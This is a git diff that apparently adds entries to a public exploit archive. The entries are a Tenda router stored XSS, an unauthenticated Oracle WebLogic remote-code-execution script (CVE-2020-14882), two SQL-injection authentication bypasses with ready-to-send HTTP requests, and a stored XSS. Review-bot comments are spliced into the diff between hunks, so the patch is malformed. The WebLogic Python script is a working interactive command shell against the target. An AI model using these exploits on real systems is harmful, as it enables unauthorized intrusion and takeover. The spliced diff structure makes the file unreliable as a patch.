diff --git a/exploits/hardware/webapps/49478.txt b/exploits/hardware/webapps/49478.txt
new file mode 100644
index 000000000..3f40b425e
--- /dev/null
+++ b/exploits/hardware/webapps/49478.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Tenda AC5 AC1200 Wireless - 'WiFi Name & Password' Stored Cross Site Scripting
+# Exploit Author: Chiragh Arora
+# Hardware Model: Tenda AC5 AC1200
+# Firmware version: V15.03.06.47_multi
+# Tested on: Kali Linux
+# CVE ID: CVE-2021-3186
+# Date: 25.01.2021
+
+##########################################################################
+
+Steps to Reproduce -
+
+ - Navigate to the Tenda AC1200 gateway with 192.168.0.1
+ - Follow up to the WiFi Settings and click the “WiFi Name & Password” option there.
+ - Manipulate the WiFi Name with ""
+ - Click the “Save” button & as the page refresh, you’ll got an alert stating “1” within it.
+
+Note: It doesn’t matter which Network Name parameter (2.4 GHz or 5 GHz) you’re manipulating, you’ll encounter the popup over in both of them.
\ No newline at end of file
diff --git a/exploits/java/webapps/49479.py b/exploits/java/webapps/49479.py
new file mode 100755
index 000000000..b577bccdf
--- /dev/null
+++ b/exploits/java/webapps/49479.py 
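Review bot: The step `- Manipulate the WiFi Name with ""` quotes an empty string, so the value the tester entered did not survive publication (angle-bracket markup appears to have been stripped) and the steps cannot be followed as written; the prose should state in words what kind of input was used rather than rely on the lost literal, which the `“1”` alert on the next step only implies. The header records the tested firmware (`V15.03.06.47_multi`) but no fixed version or vendor response, so a reader cannot tell whether current firmware is affected; add a `# Fixed in:` line, or say it is unknown. From a defensive standpoint the root cause is a user-controlled SSID rendered unencoded in the router's admin pages, so the mitigation is HTML-encoding the name on output, and because the value is stored any administrator who opens that page is affected.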
@@ -0,0 +1,91 @@
+# Exploit Title: Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)
+# Google Dork: inurl:\\\"/console/login/LoginForm.jsp\\\"
+# Date: 25/1/2021
+# Exploit Author: CHackA0101
+# Vendor Homepage: https://www.oracle.com/security-alerts/cpuoct2020.html
+# Version: Oracle WebLogic Server, version 12.2.1.0
+# Tested on: Oracle WebLogic Server, version 12.2.1.0 (OS: Linux PDT 2017 x86_64 GNU/Linux)
+# Software Link: https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html
+# CVE : CVE-2020-14882
+
+# More Info: https://github.com/chacka0101/exploits/blob/master/CVE-2020-14882/README.md
+
+#!/usr/bin/python3
+
+import requests
+import argparse
+import http.client
+http.client.HTTPConnection._http_vsn = 10
+http.client.HTTPConnection._http_vsn_str = \\\'HTTP/1.0\\\'
+
+parse = argparse.ArgumentParser()
+parse.add_argument(\\\'-u\\\', \\\'--url\\\', help=\\\'url\\\')
+args = parse.parse_args()
+
+proxies = {\\\'http\\\' : \\\'127.0.0.1:8080\\\'}
+cmd_ = \\\"\\\"
+
+# Headers
+headers = {
+ \\\"User-Agent\\\": \\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0\\\",
+ \\\"Accept\\\": \\\"application/json, text/plain, */*\\\",
+ \\\"Accept-Language\\\": \\\"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\\\",
+ \\\"Accept-Encoding\\\": \\\"gzip, deflate\\\",
+ \\\"Upgrade-Insecure-Requests\\\": \\\"1\\\",
+ \\\"Content-Type\\\": \\\"application/x-www-form-urlencoded\\\",
+ \\\"Cache-Control\\\": \\\"max-age=0\\\",
+ \\\"Connection\\\": \\\"close\\\"
+}
+
+# Oracle WebLogic Server 12.2.1.0 - Unauthenticated RCE via python Explotation:
+url = args.url + \\\"\\\"\\\"/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\\\"java.lang.Runtime.getRuntime().exec();\\\");\\\"\\\"\\\"
+url_ = args.url + \\\"/console/images/%252E%252E%252Fconsole.portal\\\"
+
+form_data_ = 
\\\"\\\"\\\"_nfpb=false&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\\\"weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();
+weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();
+java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\\"connectionHandler\\\");
+field.setAccessible(true);
+Object obj = field.get(adapter);
+weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod(\\\"getServletRequest\\\").invoke(obj);
+String cmd = req.getHeader(\\\"cmd\\\");
+String[] cmds = System.getProperty(\\\"os.name\\\").toLowerCase().contains(\\\"window\\\") ? new String[]{\\\"cmd.exe\\\", \\\"/c\\\", cmd} : new String[]{\\\"/bin/sh\\\", \\\"-c\\\", cmd};
+if (cmd != null) {
+ String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter(\\\"\\\\\\\\\\\\A\\\").next();
+ weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod(\\\"getResponse\\\").invoke(req);
+ res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
+ res.getServletOutputStream().flush();
+ res.getWriter().write(\\\"\\\");
+}executeThread.interrupt();
+\\\");\\\"\\\"\\\"
+
+#data_ = parse.urlencode(form_data_)
+results1 = requests.get(url, headers=headers)
+
+if results1.status_code == 200:
+ print(\\\"(Load Headers... \\\\n\\\")
+ print(\\\"(Data urlencode... \\\\n\\\")
+ print(\\\"(Execute exploit... 
\\\\n\\\")
+ print(\\\"(CHackA0101GNU/Linux)$ Successful Exploitation \\\\n\\\")
+ while True:
+ cmd_test = input(\\\"(CHackA0101GNU/Linux)$ \\\")
+ if cmd_test == \\\"exit\\\":
+ break
+ else:
+ try:
+ cmd_ = cmd_test
+ headers = {
+ \\\'cmd\\\': cmd_,
+ \\\'Content-Type\\\': \\\'application/x-www-form-urlencoded\\\',
+ \\\'User-Agent\\\': \\\'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\\\',
+ \\\'Accept\\\': \\\'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\\\',
+ \\\'Connection\\\': \\\'close\\\',
+ \\\'Accept-Encoding\\\': \\\'gzip, deflate\\\',
+ \\\'Content-Length\\\': \\\'1244\\\',
+ \\\'Content-Type\\\': \\\'application/x-www-form-urlencoded\\\'
+ }
+ results_ = requests.post(url_, data=form_data_, headers=headers, stream=True).text
+ print(results_)
+ except:
+ pass
+else:
+ print(\\\"(CHackA0101GNU/Linux)$ Fail.\\\\n\\\")
\ No newline at end of file
diff --git a/exploits/php/webapps/49475.txt b/exploits/php/webapps/49475.txt
new file mode 100644
index 000000000..bda375beb
--- /dev/null
+++ b/exploits/php/webapps/49475.txt 
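Review bot: The `#!/usr/bin/python3` shebang sits after twelve comment lines, where the interpreter will never honour it, and the header block links the October 2020 CPU as `Vendor Homepage` without ever stating the remediation; move the shebang to line 1 and add `# Fixed in: Oracle Critical Patch Update October 2020 (see Vendor Homepage)` beside the CVE line. In the body, `proxies` is built but never passed to either `requests` call, the per-command `headers` dict lists `'Content-Type'` twice (only the last value survives in a dict literal), and the closing `except: pass` swallows every error including `KeyboardInterrupt`; `except requests.RequestException as exc: print(exc)` reports transport failures without masking Ctrl-C. For defenders the request shape is spelled out in `url` and `url_`: a double-encoded `../` (`%252E%252E%252F`) under `/console/images/` combined with a `handle=...ShellSession(` parameter, which is what access-log review and WAF rules for CVE-2020-14882 should key on, and beyond patching the administration console path should not be reachable from untrusted networks. The `if results1.status_code == 200:` block is complete within the hunk.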
@@ -0,0 +1,36 @@
+# Exploit Title: Cemetry Mapping and Information System 1.0 - 'user_email' Sql Injection (Authentication Bypass)
+# Exploit Author: Marco Catalano
+# Date: 2021-01-25
+# Vendor Homepage: https://www.sourcecodester.com/php/12779/cemetery-mapping-and-information-system-using-phpmysqli.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=12779&title=Cemetery+Mapping+and+Information+System+Using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: 1.0
+# Vulnerable parameter: "user_email" (POST method)
+# Tested on: Linux, PHP/7.4.11
+
+Explaination:
+The userAuthentication function defined in "/include/accounts.php" implements the following code:
+
+$mydb->setQuery("SELECT * FROM `tbluseraccount` WHERE `U_USERNAME` = '". $U_USERNAME ."' and `U_PASS` = '". $h_pass ."'");
+
+which is called when trying to log into the administrative panel at "/admin/login.php".
+
+Proof Of Concept:
+
+The user input is not properly sanitized and this leads to authentication bypass through the classic "' or '1' = '1 -- -" where has to be a valid username. For example, the default username is "janobe".
+
+
+POST /admin/login.php?logout=1 HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 69
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/admin/login.php?logout=1
+Cookie: wp-settings-time-1=1611158502; PHPSESSID=ujhslpm8cg18eeb1jd7nempudj
+Upgrade-Insecure-Requests: 1
+
+user_email=janobe%27+or+%271%27+%3D+%271--+-&user_pass=test&btnLogin=
\ No newline at end of file
diff --git a/exploits/php/webapps/49476.txt b/exploits/php/webapps/49476.txt
new file mode 100644
index 000000000..016f47f9e
--- /dev/null
+++ b/exploits/php/webapps/49476.txt 
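Review bot: In the Proof Of Concept paragraph the sentence `... through the classic "' or '1' = '1 -- -" where has to be a valid username` has lost its subject — the placeholder naming the username (presumably written in angle brackets) was stripped, so the sentence no longer says what must be valid; the same gap appears word for word in 49476.txt. Both advisories quote the vulnerable query but neither states the remediation, so a closing line such as `Fix: use mysqli prepared statements with bound parameters instead of concatenating $U_USERNAME / $name into the query` would make them actionable for the maintainers they target. `Explaination:` is misspelled in 49475, 49476 and 49477, and the title's `Cemetry` disagrees with the vendor URL's `cemetery`, which will hurt searchability of the index entry as well.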
@@ -0,0 +1,38 @@
+# Exploit Title: Simple College Website 1.0 - 'name' Sql Injection (Authentication Bypass)
+# Exploit Author: Marco Catalano (@stunn4)
+# Date: 2021-01-25
+# Vendor Homepage: https://www.sourcecodester.com/php/7772/simple-college-website-using-php-and-mysql.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=7772&title=Simple+College+Website+using++PHP%2FMySQLi+with+Source+Code
+# Affected Version: 1.0
+# Vulnerable parameter: "name" (POST method)
+# Tested on: Linux, PHP/7.4.11
+
+Explaination:
+The source of "/admin_pages/login.php" file defines the following lines of code:
+
+$name=$_POST['name'];
+$password=$_POST['password'];
+$result=mysqli_query($conn,"SELECT * FROM users WHERE name='$name' AND Password='$password'");
+
+which are called when trying to log into the administrative panel at "/admin_pages/login.php" itself.
+
+Proof Of Concept:
+
+The user input is not properly sanitized and this leads to authentication bypass through the classic "' or '1' = '1 -- -" where has to be a valid username. For example, the default username is "florian".
+
+
+POST /admin_pages/login.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 66
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/admin_pages/login.php
+Cookie: wp-settings-time-1=1611158502; PHPSESSID=ujhslpm8cg18eeb1jd7nempudj
+Upgrade-Insecure-Requests: 1
+
+name=florian%27+or+%271%27+%3D+%271+--+-&password=test&login=Login
\ No newline at end of file
diff --git a/exploits/php/webapps/49477.txt b/exploits/php/webapps/49477.txt
new file mode 100644
index 000000000..045034129
--- /dev/null
+++ b/exploits/php/webapps/49477.txt 
@@ -0,0 +1,48 @@
+# Exploit Title: Simple College Website 1.0 - 'full' Stored Cross Site Scripting
+# Exploit Author: Marco Catalano (@stunn4)
+# Date: 2021-01-25
+# Vendor Homepage: https://www.sourcecodester.com/php/7772/simple-college-website-using-php-and-mysql.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=7772&title=Simple+College+Website+using++PHP%2FMySQLi+with+Source+Code
+# Affected Version: 1.0
+# Vulnerable parameter: "full" (POST method)
+# Tested on: Linux, PHP/7.4.11
+
+Explaination:
+The source of "/admin_pages/admission.php" file defines the following lines of code:
+
+if (isset($_POST['add'])&&!empty($_POST['full'])) {
+ $full=$_POST['full'];
+ $query=mysqli_query($conn,"UPDATE `contents` SET `full_contents`='$full' WHERE `id`='2'");
+ if ($query) {
+ echo "Page changed..!";
+ } else if(!$query){
+ echo "Page is not changed..!";
+ }
+}
+
+
+which allow to an authenticated administrator to modify the source code of the page.
+Every change is then reflected and the user-input is not properly sanitized, this leads to cross site scripting attacks.
+An attacker may try to gain access to the admin panel using authentication bypass through sql injection exploit. 
+
+Proof Of Concept:
+The attacker is logged into the administrator panel and modifies the source code of admission.php page to inject javascript code as it follows:
+
+
+POST /admin_pages/admission.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 71
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/admin_pages/admission.php
+Cookie: wp-settings-time-1=1611158502; PHPSESSID=ujhslpm8cg18eeb1jd7nempudj
+Upgrade-Insecure-Requests: 1
+
+full=&add=Update+Contents
+
+The XSS payload is stored in the database, so a victim would browse http://127.0.0.1/admission.php and execute the XSS payload.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index a0734ca12..f31de1c62 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv 
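Review bot: The request body `full=&add=Update+Contents` is 25 bytes while the quoted `Content-Length: 71` says the real body was 71, so the stored value was stripped from the advisory and the PoC no longer shows what was submitted; the prose should describe the kind of input used instead of relying on the lost literal. The impact paragraph should be scoped more carefully: the quoted handler exists so an administrator can write raw page HTML, so the practical severity of this finding rests on an attacker reaching an admin session (the text already points at the 49476 login bypass for that) rather than on input filtering alone, and the `Proof Of Concept:` heading should say so. The same snippet also interpolates `$full` straight into the `UPDATE` statement (`'$full'`), so a remediation line should call for a prepared statement in addition to context-aware output encoding wherever `full_contents` is rendered, including `/admission.php`. `Explaination:` is misspelled.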
@@ -43669,3 +43669,8 @@ id,file,description,date,author,type,platform,port
 49470,exploits/php/webapps/49470.txt,"CASAP Automated Enrollment System 1.0 - 'route' Stored XSS",2021-01-25,"Richard Jones",webapps,php,
 49471,exploits/php/webapps/49471.txt,"Library System 1.0 - 'category' SQL Injection",2021-01-25,"Aitor Herrero",webapps,php,
 49474,exploits/php/webapps/49474.rb,"Klog Server 2.4.1 - Unauthenticated Command Injection (Metasploit)",2021-01-25,"Metin Yunus Kandemir",webapps,php,
+49475,exploits/php/webapps/49475.txt,"Cemetry Mapping and Information System 1.0 - 'user_email' Sql Injection (Authentication Bypass)",2021-01-26,"Marco Catalano",webapps,php,
+49476,exploits/php/webapps/49476.txt,"Simple College Website 1.0 - 'name' Sql Injection (Authentication Bypass)",2021-01-26,"Marco Catalano",webapps,php,
+49477,exploits/php/webapps/49477.txt,"Simple College Website 1.0 - 'full' Stored Cross Site Scripting",2021-01-26,"Marco Catalano",webapps,php,
+49478,exploits/hardware/webapps/49478.txt,"Tenda AC5 AC1200 Wireless - 'WiFi Name & Password' Stored Cross Site Scripting",2021-01-26,"Chiragh Arora",webapps,hardware,
+49479,exploits/java/webapps/49479.py,"Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)",2021-01-26,CHackA0101,webapps,java,